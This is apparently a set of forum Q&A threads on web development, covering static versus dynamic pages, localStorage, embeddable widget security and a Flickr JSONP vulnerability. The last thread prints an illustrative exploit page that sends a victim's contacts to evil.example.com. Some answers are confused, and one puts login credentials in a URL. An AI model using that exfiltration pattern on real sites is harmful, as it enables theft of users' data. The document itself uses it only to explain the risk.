I have built my first website, but there are lots of problems. For example, when I click the poster of an article, the data for the clicked poster is loaded into local storage, and the article HTML page that opens reads this data from local storage and displays it. But in that case no unique URL is generated; every article page ends in article.html. The pages just load different data depending on which poster I click. I thought maybe there is a way to create a new, unique HTML page in your hosting provider's file management system with JavaScript.
There is no way for client-side JavaScript, on its own, to create files on a website.
If this were possible, then every major website would find all its content overwritten with whatever random passers-by felt like storing.
JavaScript can make HTTP requests to a server (e.g. with the fetch API). You can then process the content of the request with server-side code (written in any programming language you like and that your hosting service supports).
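For example, one way to give each article a unique URL without creating new files is to put an article id in the query string and have JavaScript fetch that article's data from your server. This is only a minimal sketch; the /articles endpoint, the id parameter, and the element selectors are assumptions, not anything from your actual site:

// article.html?id=42 — read the article id from the URL instead of local storage
const id = new URLSearchParams(window.location.search).get("id");

// ask the server for that article's data (the /articles endpoint is hypothetical)
fetch("/articles/" + encodeURIComponent(id))
  .then((response) => response.json())
  .then((article) => {
    document.querySelector("h1").textContent = article.title;
    document.querySelector("#content").innerHTML = article.body;
  });

With this approach every article gets its own shareable URL (article.html?id=42, article.html?id=43, ...) even though they are all served by the same HTML file.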
My prof said that dynamic pages get created by the computer, while static pages are created by the user.
Thank you so much!
The difference between static pages and dynamic pages:
A static page has a plain URL ending such as .htm, .html, or .shtml, and its URL does not contain a "?", whereas a dynamic page's URL often does;
Websites built with dynamic page techniques can offer more functionality, such as user registration, login, online surveys, user management, order management, etc.;
Application and web languages:
Static web pages: HTML, JavaScript, CSS, etc.
Dynamic Web Pages: PHP, CGI, AJAX, ASP, ASP.NET, etc.
Dynamic web pages are used where information changes frequently, such as stock prices, weather information, news and sports news.
Static web pages have fixed content, while dynamic web pages can have changing content.
Static web pages must be modified manually, while changes to a dynamic page can be loaded through an application whose resources are stored in a database.
Static web pages only use a web server, while dynamic web pages use a web server, an application server, and a database.
Regarding: "How to tell if a website is static or dynamic?"
Static websites are simple web pages (typically written in HTML, CSS, JavaScript, etc.) stored on a web server. In the case of static web pages, as soon as the server receives a request for a page, it immediately sends the response to the client with no additional processing. Users will always see the same content regardless of their location, device type, or web browser.
In static websites, the displayed content remains the same unless someone manually edits the HTML source code on every page that's part of the website. These pages contain no alterations based on any user input, hence the name: static web pages. You don't necessarily need any prior experience with database design or web programming to create and maintain a static website; the code for a static web page simply stays the same until you update it.
On the other hand, Dynamic web pages have greater complexity than static ones because they display different content for each user while retaining the same layout and design. A dynamic website generates web pages in real-time. The flexible nature of the content allows for customization based on the requests from the user or the browser used by them. Such pages are usually written in languages like CGI, AJAX, ASP or ASP.NET, and they usually take more time to load than static web pages. They are frequently implemented to show information that changes frequently, e.g., weather updates, stock prices, etc.
Server-side code used to construct a dynamic web page can generate real-time HTML pages for each request from an individual user. While static websites are mostly informational, dynamic websites contain interactive, continually changing elements. In order to provide an interactive website experience for visitors, web developers usually combine both client-side and server-side programming techniques.
Dynamic web pages usually contain application programs for various services and require server-side resources like databases. A dynamic website accesses content from a CMS (Content Management System), which means that the website reflects any changes made in the database content. These sites use client-side scripting, server-side scripting, or both for generating content. Separating the site’s design from its content makes it easier for web designers to create pages without having to worry about formatting issues. After uploading content into the database, websites retrieve their content from there when responding to user requests.
Now, regarding "Would www.tagpro.gg (the homepage) be static or dynamic?"
I have visited the homepage, and it is indeed a dynamic web page, as you mentioned.
My prof said that dynamic pages get created by the computer, while static pages are created by the user.
Well, actually static pages can also be generated by the computer, since there are a lot of static site generators out there. Take, for example, https://astro.build or https://gohugo.io
Would www.tagpro.gg be static or dynamic?
You are right, it is dynamic, since you can see a login/sign-up feature on the page. That's not something you can achieve with a 100% static site.
It's very simple... only two major factors matter:
A static website has no logic of its own, meaning it cannot add or change anything automatically; the user has to write the code themselves if they want something changed, whereas a dynamic website can do it on its own.
A static website cannot store information: it only has a front end, with no back end such as PHP, Node.js, or the like. In simpler words, if a user signs in to your website, you would not be able to store their username and password.
I have seen a lot of people using local storage to store certain parts of a web page, but not an entire web page. Is that possible? If so, how? If not, is there a way to store an entire web page's data so the user can come back to it how they left it?
This can be done if you use JavaScript to save document.body.innerHTML into web storage, and use JavaScript to load it back from storage the next time the page is loaded. If the page is not in web storage, you could redirect the user to the web page.
But this depends on the design of your web page, and on whether there is a session index or similar in the body of the page.
You should also think of some way to handle versions. You don't want your users to only ever use the cached version of your web page; it should be refreshed once you update the page.
Session storage is only about 5 MB, so you can't save very much, especially not pictures.
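A minimal sketch of that idea, assuming you pick a version string by hand (the key names and PAGE_VERSION are purely illustrative):

const PAGE_VERSION = "2024-06-01"; // bump this whenever you change the page

// save the current body just before the user leaves
window.addEventListener("beforeunload", function () {
  localStorage.setItem("savedBody", document.body.innerHTML);
  localStorage.setItem("savedVersion", PAGE_VERSION);
});

// on the next visit, restore it only if the saved version still matches
window.addEventListener("DOMContentLoaded", function () {
  const saved = localStorage.getItem("savedBody");
  if (saved && localStorage.getItem("savedVersion") === PAGE_VERSION) {
    document.body.innerHTML = saved;
  }
});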
Since localStorage allows you to store about 5 MB, you can store a full web page there and then just pass it to document.write().
The following code does it:
Storing it:
var HTML = ""; //html of the page goes here
localStorage.setItem("content", HTML);
Retrieving it:
document.write(localStorage.getItem("content"));
Although this is possible, common practice is to save only settings and load them into the right elements, rather than the entire web page.
This is not really answering your question, but if you are only curious how this can be done and don't need wide browser support, I suggest you look into Service Workers, as making websites work offline is something they solve very well.
One of their many capabilities is that they can act as a proxy for any request your website makes, and respond with locally saved data, instead of going to the server.
This allows you to write your application code exactly the same way as you would normally, with the exception of registering the Service Worker (which is done only once).
https://developers.google.com/web/fundamentals/getting-started/primers/service-workers
https://jakearchibald.github.io/isserviceworkerready/
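As a very rough illustration of that proxy idea (the file name sw.js and the strategy shown are placeholders, not an official recipe):

// on the page: register the worker once
if ("serviceWorker" in navigator) {
  navigator.serviceWorker.register("/sw.js");
}

// in sw.js: answer requests from the cache first, fall back to the network
self.addEventListener("fetch", function (event) {
  event.respondWith(
    caches.match(event.request).then(function (cached) {
      return cached || fetch(event.request);
    })
  );
});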
Local storage here is actually just an endpoint: it has an IP address and can be accessed from the web.
First of all, you need to make sure that your DNS service points to your index page.
For example, if your local storage's IP is 10.10.10.10 and the files on that storage are organized like:
contents/
  pages/
    index.html
    page2.html
  images/
    welcome.png
So you can point your DNS like:
10.10.10.10/index -> /contents/pages/index.html
In most web frameworks (a web framework is a library that provides built-in tools that let you build your web site more easily and with more functionality), there is a built-in module, usually called a 'router', that provides functionality like this.
In that way, from your index.html file you can reference the entire web site. In your routes you then define, for example:
For all the files with the .html extension, route to -> 10.10.10.10/contents/pages/
For all the files with the .png/.jpg extension, route to -> 10.10.10.10/contents/images/
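As a rough sketch of that routing idea in a Node.js/Express style (the framework choice, the paths, and the port are assumptions for illustration only):

const express = require("express");
const app = express();

// serve files under contents/pages at the site root (index.html, page2.html, ...)
app.use(express.static("contents/pages"));

// serve .png/.jpg files from contents/images under the /images path
app.use("/images", express.static("contents/images"));

app.listen(80);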
Local storage is usually for storing key-value pairs; storing a whole page there would be a ridiculous idea. Try instead an AJAX call that returns a partial view, and use that to manipulate the DOM.
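A minimal sketch of that approach (the /partials/article URL and the container id are made up for illustration):

// fetch an HTML fragment (a partial view) from the server and inject it into the page
fetch("/partials/article")
  .then(function (response) { return response.text(); })
  .then(function (html) {
    document.getElementById("container").innerHTML = html;
  });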
I'm building a website that is functionally similar to Google Analytics. I'm not doing analytics, but I am trying to provide either a single line of javascript or a single line iframe that will add functionality to other websites.
Specifically, the embedded content will be a button that will popup a new window and allow the user to perform some actions. Eventually the user will finish and the window will close, at which point the button will update to a new element reflecting that the user completed the flow.
The popup window will load content from my site, but my question pertains to the embedded line of javascript (or the iframe). What's the best practice way of doing this? Google analytics and optimizely use javascript to modify the host page. Obviously an iFrame would work too.
The security concern I have is that someone will copy the embed code from one site and put it on another. Each page/site combination that implements my script/iframe is going to have a unique ID that the site's developers will generate from an authenticated account on my site. I then supply them with the appropriate embed code.
My first thought was to just use an iframe that loads a page off my site with url parameters specific to the page/site combo. If I go that route, is there a way to determine that the page is only loaded from an iframe embedded on a particular domain or url prefix? Could something similar be accomplished with javascript?
I read this post which was very helpful, but my use case is a bit different since I'm actually going to pop up content for users to interact with. The concern is that an enemy of the site hosting my embed will deceptively lure their own users to use the widget. These users will believe they are interacting with my site on behalf of the enemy site but actually be interacting on behalf of the friendly site.
If you want to keep it as a simple, client-side only widget, the simple answer is you can't do it exactly like you describe.
The two solutions that come to mind for this are as follows, the first being a compromise but simple and the second being a bit more involved (for both you and users of your widget).
Referer Check
You could validate the referer HTTP header to check that the domain matches the one expected for the particular Site ID, but keep in mind that not all browsers will send this (and most will not if the referring page is HTTPS) and that some browser privacy plugins can be configured to withhold it, in which case your widget would not work or you would need an extra, clunky, step in the user experience.
Website www.foo.com embeds your widget using say an embedded script <script src="//example.com/widget.js?siteId=1234&pageId=456"></script>
Your widget uses server side code to generate the .js file dynamically (e.g. the request for the .js file could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the referer HTTP header to see if it matches the expected value in your database.
On match the widget runs as normal.
On mismatch, or if the referer is blank/missing, the widget will still run, but there will be an extra step that asks the user to confirm that they have accessed the widget from www.foo.com
In order for the confirmation to be safe from clickjacking, you must open the confirmation step in a popup window.
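A rough sketch of the referer check, written here in Node.js/Express purely for illustration (the steps above suggest PHP/ASPX; lookupSite, buildWidgetJs and buildConfirmationWidgetJs are hypothetical helpers you would implement):

const express = require("express");
const app = express();

// GET /widget.js?siteId=1234&pageId=456
app.get("/widget.js", function (req, res) {
  const site = lookupSite(req.query.siteId, req.query.pageId); // hypothetical DB lookup
  const referer = req.get("Referer") || "";

  res.type("application/javascript");
  if (site && referer.startsWith(site.expectedOrigin)) {
    res.send(buildWidgetJs(site));              // referer matches: run as normal
  } else {
    res.send(buildConfirmationWidgetJs(site));  // mismatch or missing: ask the user to confirm
  }
});

app.listen(3000);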
Server Check
This could be a bit over-engineered for your purposes and runs the risk of becoming too complicated for clients who wish to embed your widget; you decide.
Website www.foo.com wants to embed your widget for the current page request it is receiving from a user.
The www.foo.com server makes an API request (passing a secret key) to an API you host, requesting a one time key for Page ID 456.
Your API validates the secret key, generates a secure one time key and passes back a value whilst recording the request in the database.
www.foo.com embeds the script as follows <script src="//example.com/widget.js?siteId=1234&oneTimeKey=231231232132197"></script>
Your widget uses server side code to generate the js file dynamically (e.g. the .js could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the oneTimeKey and siteId combination to check it is valid, and if so generates the widget code and deletes the database record.
If the user reloads the page, the above steps are repeated and a new one-time key is generated. This guards against evil.com scraping the embed code and its parameters off the page.
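And a similarly non-authoritative sketch of the one-time-key flow, again in Node.js/Express with the database simplified to an in-memory Map (secret handling is deliberately naive here):

const express = require("express");
const crypto = require("crypto");
const app = express();

const oneTimeKeys = new Map(); // oneTimeKey -> { siteId, pageId }

// steps 2-3: the embedding site's server requests a one-time key, passing its secret
app.post("/api/one-time-key", function (req, res) {
  if (req.get("X-Secret-Key") !== "per-site-secret") return res.sendStatus(403);
  const key = crypto.randomBytes(16).toString("hex");
  oneTimeKeys.set(key, { siteId: req.query.siteId, pageId: req.query.pageId });
  res.json({ oneTimeKey: key });
});

// steps 5-6: the browser requests widget.js; the key is valid exactly once
app.get("/widget.js", function (req, res) {
  const record = oneTimeKeys.get(req.query.oneTimeKey);
  res.type("application/javascript");
  if (record && record.siteId === req.query.siteId) {
    oneTimeKeys.delete(req.query.oneTimeKey); // "delete the database record"
    res.send("/* widget code for site " + record.siteId + " */");
  } else {
    res.send("/* invalid or already-used key */");
  }
});

app.listen(3000);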
The response here is very thorough and provides lots of great information and ideas. I solved this problem by validating X-Frame-Options headers on the server side, though browser support for those is incomplete and they are possibly spoofable.
I'm having trouble figuring out how to generate, on the server side, a PDF from a JavaScript-heavy web page served from Tomcat (the application is Pentaho CE). The content is a dashboard that responds to user interaction: Pentaho replaces divs dynamically with various content through AJAX calls. I'd like to export to PDF whatever state the user has the dashboard in. There are no restrictions on what I can put on the server, but I need to avoid having the client install anything.
I've taken a look at this, along with a bunch of other google-fu:
JSP/HTML Page to PDF conversion
wkhtmltopdf seems to be a popular choice; before I start banging my head against it, I have a few questions:
Can wkhtmltopdf handle going to password protected jsps where authentication is handled by the application? Would the dynamically loaded divs break it?
Is there a way to perhaps return the client view to the server for processing? I read about screen capturing...
Another option that could work out would be to automate a local access to the dashboard on the server through a server-hosted web browser and generate a PDF that way...is this possible, given the constraints of Tomcat and password protection that's handled by the application? The javascript components that Pentaho generates cannot be accessed outside of the application.
Thanks!
EDIT:
Good news! wkhtmltopdf works! Kind of. I got past the password authentication by putting the login details in a query string, and I'm getting a PDF of the correct page now. The issue is that no JavaScript components are showing up... (they work for pages like yahoo.com, so maybe I'm missing something here).
If you have a lot of AJAX calls you should wait for them. Use the --javascript-delay x argument, where x is the time to wait in milliseconds.
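For example, a typical invocation might look like the following (the URL, credentials, delay value, and output name are placeholders; the login-in-query-string part mirrors what you described above):

wkhtmltopdf --javascript-delay 5000 "http://example.com/dashboard?user=admin&pass=secret" dashboard.pdf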
This flickr blog post discusses the thought behind their latest improvements to the people selector autocomplete.
One problem they had to overcome was how to parse and otherwise handle so much data (i.e., all your contacts) client-side. They tried getting XML and JSON via AJAX, but found it too slow. They then had this to say about loading the data via a dynamically generated script tag (with callback function):
JSON and Dynamic Script Tags: Fast but Insecure
Working with the theory that large string manipulation was the problem with the last approach, we switched from using Ajax to instead fetching the data using a dynamically generated script tag. This means that the contact data was never treated as string, and was instead executed as soon as it was downloaded, just like any other JavaScript file. The difference in performance was shocking: 89ms to parse 10,000 contacts (a reduction of 3 orders of magnitude), while the smallest case of 172 contacts only took 6ms. The parse time per contact actually decreased the larger the list became. This approach looked perfect, except for one thing: in order for this JSON to be executed, we had to wrap it in a callback method. Since it's executable code, any website in the world could use the same approach to download a Flickr member's contact list. This was a deal breaker. (emphasis mine)
Could someone please go into the exact security risk here (perhaps with a sample exploit)? How is loading a given file via the "src" attribute in a script tag different from loading that file via an AJAX call?
This is a good question and this exact sort of exploit was once used to steal contact lists from gmail.
Whenever a browser fetches data from a domain, it sends across any cookie data that the site has set. This cookie data can then be used to authenticate the user and fetch any user-specific data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stackoverflow uses that data to determine who you are, and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and Javascript files.
The security vulnerability that Flickr faced was that any website could embed this javascript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the javascript was hosted on flickr.com), and Flickr would generate a javascript document containing the sensitive data. The malicious site would then be able to get access to the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434
If I was to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.
In plain English:
Unauthorised computer code (Javascript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule.
There is no corresponding restriction on where code can be sourced from, so if you embed data in code any website the user visits can employ the user's credentials to obtain the user's data.
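To make that concrete, here is a sketch of what such a hostile page could look like (the callback parameter and URLs are invented for illustration; the attack only works when the endpoint wraps its JSON in a callback and authenticates purely via cookies):

<!-- hosted on evil.example.com -->
<script>
  // the callback the JSONP-style endpoint will wrap the data in
  function handleContacts(contacts) {
    // ship the victim's contact list off to the attacker's server
    new Image().src = "https://evil.example.com/collect?data=" +
        encodeURIComponent(JSON.stringify(contacts));
  }
</script>
<!-- the victim's flickr.com cookies ride along with this request,
     so the returned script contains their contacts -->
<script src="https://www.flickr.com/contacts.js?callback=handleContacts"></script>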